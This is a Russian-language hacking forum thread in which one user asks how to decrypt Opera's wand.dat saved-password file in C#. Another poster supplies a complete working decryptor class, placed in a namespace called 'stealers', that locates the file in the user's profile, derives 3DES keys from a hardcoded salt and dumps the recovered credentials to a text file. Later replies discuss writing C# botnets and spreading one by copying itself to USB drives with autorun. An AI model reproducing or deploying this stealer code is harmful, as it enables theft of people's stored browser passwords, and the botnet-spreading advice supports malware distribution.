[Информация] Расшифровка wand.dat (пароли Opera)

[BassBoy[Aмнис]]

Привет Всем
Я бы хотел узнать возможно ли расшифровать файл wand.dat на шарпе?
Если да, то как?)

[warl0ck]

а тебе зачем? не деструктивная ли деятельность часом?

[BassBoy[Aмнис]]

Цитата: Сообщение от warl0ck а тебе зачем? не деструктивная ли деятельность часом?

не
пс: сам знаешь как?

[warl0ck]

Цитата: Сообщение от BassBoy[Aмнис] не

Код:

using System;
using System.Collections.Generic;
using System.Text;
using System.Security.Cryptography;
using System.IO;

namespace stealers
{
    class OperaDecrypt
    {
        public static byte[] OperaSalt = { 0x83, 0x7D, 0xFC, 0x0F, 0x8E, 0xB3, 0xE8, 0x69, 0x73, 0xAF, 0xFF };
        public static string Path = Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData);
		public static string Lognameopera = @"Opera.txt";
		
        public static void Getpass()
        {
            if (File.Exists(Lognameopera))
            {
                File.Delete(Lognameopera);
            }

            if(File.Exists(Path + @"\Opera\Opera\wand.dat"))
            {
                Path += @"\Opera\Opera\wand.dat";
                FindBlocks();
            }
            else if (File.Exists(Path + @"\Opera\Opera\profile\wand.dat"))
            {
                Path += @"\Opera\Opera\profile\wand.dat";
                FindBlocks();
            }
        }

        public static void FindBlocks()
        {
            var writer = File.CreateText(Lognameopera);
            try
            {
                var tmpData = new List<string>();
                var wandFile = File.ReadAllBytes(Path);
				
                for (var i = 0; i < wandFile.Length - 4; i++)
                {
                    if (wandFile[i] != 0x00 || wandFile[i + 1] != 0x00 || wandFile[i + 2] != 0x00 || wandFile[i + 3] != 0x08) 
						continue;
                    var blockSize = (int)wandFile[i + 15];

                    var key = new byte[8];
                    var encryptData = new byte[blockSize];
                    Array.Copy(wandFile, i + 4, key, 0, key.Length);
                    Array.Copy(wandFile, i + 16, encryptData, 0, encryptData.Length);

                    tmpData.Add(Decrypt2Method(key, encryptData));

                    i += 11 + blockSize;
                }
				
                foreach (var line in tmpData)
                {
                    writer.WriteLine(line);
                    writer.Flush();
                }
            }
            catch
            {
            }
            writer.Close();
        }

        public static string Decrypt2Method(byte[] key, byte[] encryptData)
        {
            try
            {
                var md5Crypt = new MD5CryptoServiceProvider();
                md5Crypt.Initialize();

                var tmpBuffer = new byte[OperaSalt.Length + key.Length];
                Array.Copy(OperaSalt, tmpBuffer, OperaSalt.Length);
                Array.Copy(key, 0, tmpBuffer, OperaSalt.Length, key.Length);
                var hash1 = md5Crypt.ComputeHash(tmpBuffer);

                tmpBuffer = new byte[hash1.Length + OperaSalt.Length + key.Length];
                Array.Copy(hash1, tmpBuffer, hash1.Length);
                Array.Copy(OperaSalt, 0, tmpBuffer, hash1.Length, OperaSalt.Length);
                Array.Copy(key, 0, tmpBuffer, hash1.Length + OperaSalt.Length, key.Length);
                var hash2 = md5Crypt.ComputeHash(tmpBuffer);

                var tripleDes = new TripleDESCryptoServiceProvider {Mode = CipherMode.CBC, Padding = PaddingMode.None};

                var tripleKey = new byte[24];
                var IV = new byte[8];
                Array.Copy(hash1, tripleKey, hash1.Length);
                Array.Copy(hash2, 0, tripleKey, hash1.Length, 8);
                Array.Copy(hash2, 8, IV, 0, 8);

                tripleDes.Key = tripleKey;
                tripleDes.IV = IV;
                var decryter = tripleDes.CreateDecryptor();
                var output = decryter.TransformFinalBlock(encryptData, 0, encryptData.Length);

                var enc = Encoding.Unicode.GetString(output);

                return enc;
            }
            catch
            {
                return "";
            }
        }
    }
}

[BassBoy[Aмнис]]

warl0ck, а можешь пример использования класса рассписать?

[warl0ck]

Getpass() вызывай, что сложного то >.>

[BassBoy[Aмнис]]

Цитата: Сообщение от warl0ck Getpass() вызывай, что сложного то >.>

хм..я ж класс не подключил к форме

Блин, в текстовике лог кривоватый получаеться, да и немного с иероглифами, можно ли это поправить?

[Yukikaze]

warl0ck, если нужно вызывать только GetPass, почему у тебя все методы отмечены как паблик?

[warl0ck]

Цитата: Сообщение от Yukikaze warl0ck, если нужно вызывать только GetPass, почему у тебя все методы отмечены как паблик?

это долгая история

[BassBoy[Aмнис]]

warl0ck, так можешь сказать как исправить это:

Цитата: в текстовике лог кривоватый получаеться, да и немного с иероглифами частично

[Yukikaze]

а еще мне кажется, что писать ботнет на шарпе это маленько глупо, хоть и положительный опыт.
шарп хорошо бы выступил в качестве сервиса для управления этим делом

ЗЫ Сам писал, профита - 0, полезного опыта - over900

[Sinyss]

Цитата: Сообщение от Yukikaze а еще мне кажется, что писать ботнет на шарпе это маленько глупо, хоть и положительный опыт. шарп хорошо бы выступил в качестве сервиса для управления этим делом ЗЫ Сам писал, профита - 0, полезного опыта - over900

Распространял ручками?

[warl0ck]

Цитата: Сообщение от Sinyss Распространял ручками?

да зачем распространять, ради опыта же пишем

Цитата: Сообщение от Yukikaze а еще мне кажется, что писать ботнет на шарпе это маленько глупо, хоть и положительный опыт. шарп хорошо бы выступил в качестве сервиса для управления этим делом ЗЫ Сам писал, профита - 0, полезного опыта - over900

да, но есть и плюсы.
писал чтоб подучить сокеты и как это всё работает. тк не знал что написать(ну клиент-сервер "привет пока" это как-то по детски) гуглил и нашел описание некого п2п ботнета, по началу вовсе не понял как это всё работает. вообщем опыта получил действительно много, хоть ничего толкового так и не написал

Цитата: Сообщение от BassBoy[Aмнис] warl0ck, так можешь сказать как исправить это:

да всё нормально, ты же не для заказчика пишешь?

[BassBoy[Aмнис]]

Цитата: Сообщение от warl0ck да всё нормально, ты же не для заказчика пишешь?

ну и все таки? подскажи как..

[Yukikaze]

Sinyss, для распространения следил за подключенными девайсами, если это была флешка то копировался на нее и создавался авторан, но дальше друзей я его не пытался запустить.

warl0ck, а я что-бы закрепить сокеты писал войс чат, по которому уже грозился написать здесь статью, но руки никак не доходят.

ЗЫ Ботнет через сокеты это сурово, т.к. нужно где-то хоститься, а вот WCF служба в самый раз

Добавлено через 16 минут
BassBoy[Aмнис], залей файлик, я ковырну